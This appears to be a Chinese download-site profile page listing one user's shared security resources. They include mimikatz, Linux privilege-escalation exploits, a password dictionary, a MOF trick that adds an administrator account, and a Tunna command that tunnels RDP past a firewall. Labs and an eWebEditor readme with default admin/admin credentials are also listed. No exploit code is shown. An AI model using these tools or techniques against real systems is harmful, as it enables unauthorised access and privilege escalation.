mimikatz is now built and ready to be used! (Win32 / x64) - you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: - http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme - http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Author - Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync function in lsadump module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) This is a personal development, please respect its philosophy and don't use it for bad things!

2020-04-02

dirtycow脏牛linux提权exp

dirtycow脏牛linux提权exp

2020-03-25

内网穿透工具Tunna-master.zip

>Tunna:一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。 > 命令`python proxy.py -u http://192.168.70.129/conn.aspx -l 2345 -a 10.1.1.1 -r 3389 -s -v` 参数含义如下: : -l 表示本地监听的端口 -r 远程要转发的端口 -v 详细模式

2020-03-18

upload-labs-master.zip

简介 upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路。 3.实在没有思路时,可以点击查看提示。 4.如果黑盒情况下,实在做不出,可以点击查看源码。

2020-02-13

xss闯关小游戏.zip

这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载

2020-02-25

typecho.tar.gz

关于 名称的来历 Typecho 是由 type 和 echo 两个词合成的,来自于开发团队的头脑风暴。 Type,有打字的意思,博客这个东西,正是一个让我们通过打字,在网络上表达自己的平台。Echo,意思是回声、反馈、共鸣,也是PHP里最常见、最重要的函数,相信大部分PHP爱好者都是从 echo 'Hello,world!'; 开始自己的PHP编程之路的。 名称就表明 Typecho 是一款博客程序,它在 GPL version 2 许可证下发行,基于 PHP (需要 PHP5 以上版本)构建,可以运行在各种平台上,支持多种数据库(Mysql, PostgreSQL, SQLite)。 为什么开发 Typecho 源自开发团队在精神层面上的洁癖和狂热。在使用博客程序的大部分时间里,我们只是发几段文字,贴几张图片,不需要高级复杂的系统,需要的是一个简单快速的博客平台。在流行的开源程序中,满足我们要求的很少,于是我们决定自己动手,开发一款有性格的博客程序,并用开源协议发行。 开发团队中的几个人都是 IT 从业者,在成长的过程中从开源世界里获益匪浅,这个项目也是我们对开源的一个回报。 如何参与开发 Typecho Typecho 目前使用 Git 来控制程序版本,如果你想为 Typecho 贡献源代码,最好先弄明白 Git 的使用方法。我们目前把项目托管在 GitHub 上,任何 GitHub 用户都可以向我们贡献代码。 参与的方式很简单,【Fork】一份 Typecho 的代码到你的仓库中,修改后提交,并向我们发起【Pull Request】申请,我们会及你的申请并及时对代码进行审查。审查通过后,你的代码将被【Merge】进我们的仓库中,这样你就会自动出现在贡献者名单里了,非常方便。

2020-03-03

mof提权文件nullevt.mof

mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp.exe编译执行。

2020-03-12

BurpSuite.zip

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

2020-02-13

CentOS 5.5提权exp

CentOS 5.5提权exp

2020-03-20

Advanced_IP_Scanner IP扫描工具

Advanced_IP_Scanner IP扫描工具

2020-04-03

ewebeditor编辑器.rar

ACCESS数据库的后台管理编辑器 ======================================================================================================== eWebEditor ASP版,使用ACCESS配置数据库,带后台管理。为保证安全,强烈建议用户开始使用就修改后台管理用户及密码。 结构说明 ============================= admin : 后台管理相关图片 buttonimage : 按钮图片 css : 样式文件 db : 数据库文件 dialog : 对话框相关文件 example : 例子 include : 公用包含文件 sysimage : 系统图片 uploadfile : 默认的上传文件 安装=============================1、解开压缩包,直接拷贝到站点或建虚拟;2、访问例子文件,看是否运行正常: 1) eWebEditor 标准调用和弹窗调用示例: http://127.0.0.1/ewebeditor/example/test1.asp 2) eWebEditor 远程文件上传示例: http://127.0.0.1/ewebeditor/_example/test2.asp3、如果显示正常信息,即表示安装已完成! 使用=============================1、后台管理 地址:http://127.0.0.1/ewebeditor/admin_default.asp 默认登录用户:admin 默认登录密码:admin ======================================================================================================== ╭═══════════════╮ ║ ║ ╭══════┤ ├══════╮ ║ ║ 单机游戏网 ║ ║ ║ ║ ║ ║ ║ ╰═══════════════╯ ║ ║ ║ ║声明: ║ ║ 1) 本站不保证所提供软件或程序的完整性和安全性。 ║ ║ 2) 请在使用前查毒。 ║ ║ 4) 转载本站提供的资源请勿删除本说明文件。 ║ ║ 5) 本站提供的程序均为网上搜集,如果该程序涉及或侵害到您║ ║ 的版权请立即写信通知我们。 ║ ║ 6) 本站提供软件只可供研究使用,请在下载24小时内删除, ║ ║ 切勿用于商业用途,由此引起一切后果与本站无关。 ║ ║ ║ ║ 1. 推荐使用:WinRAR V3.2以上版本解压本站软件 ║ ║ ║ ║ ║ ║ ║ ║ ╭───────────────────────╮ ║ ╰══┤ ├══╯ ╰───────────────────────╯

2020-02-17

社会工程学_百度百科.pdf

这是对社会工程学的详细解答,它主要讲解了社会工程学的起源、主要内容、社工手段、防御手段四个方面并配有详细的解答

2020-02-06

passwod_17000.txt

密码字典,是配合密码破译软件所使用的。密码字典里包括许多人们习惯性设置的密码,这样可以提高密码破译软件的密码破译成功率和命中率,缩短密码破译的时间。 如果一个人密码设置没有规律或很复杂,未包含在密码字典里,这个字典就没有用了,甚至会延长密码破译所需要的时间。

2020-03-03

C32Asm_setup.zip

C32ASM静态反汇编工具功能概述 C32Asm现具有如下功能: 快速静态反汇编PE格式文件(Exe、Dll等) 提供Hex文件编辑功能,功能强大 提供内存Dump、内存编辑、PE文件Dump、PE内存ImageSize修正等多种实用功能 提供内存反汇编功能,提供汇编语句直接修改功能,免去OPCode的直接操作的繁琐 提供反汇编语句彩色语法功能,方便阅读分析,能方便自定义语法色彩 提供输入表、输出表、参考字符、跳转、调用、PE文件分析结果等显示 提供方便的跳转、调用目标地址的代码显示 提供汇编语句逐字节分析功能,有助于分析花指令等干扰代码 提供对ord调用和非ord调用的import自定义解析功能 提供PE文件格式的分析显示功能 提供文件拖放功能,直接可以进行文件反汇编或编辑 提供主文件命令行模式,方便加入右键菜单进行快速的文件操作 提供快速书签定位,多行代码复制,代码注释功能

2020-02-15

谁能教我iapp怎么用

发表于 2020-03-30 最后回复 2020-03-30

优秀小版主是什么?我想要一个,帮帮我

发表于 2020-02-26 最后回复 2020-02-26

热门文章数据更新不及时

发表于 2020-02-06 最后回复 2020-02-06

中国大陆人口已突破14亿——你是比以前更渺小了,还是被更多人所敬仰了?

发表于 2020-01-17 最后回复 2020-01-19

一个高中学历,初学网安的退伍军人入行有多难

发表于 2020-01-04 最后回复 2020-01-05

手机安装linux

发表于 2020-01-03 最后回复 2020-01-03

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除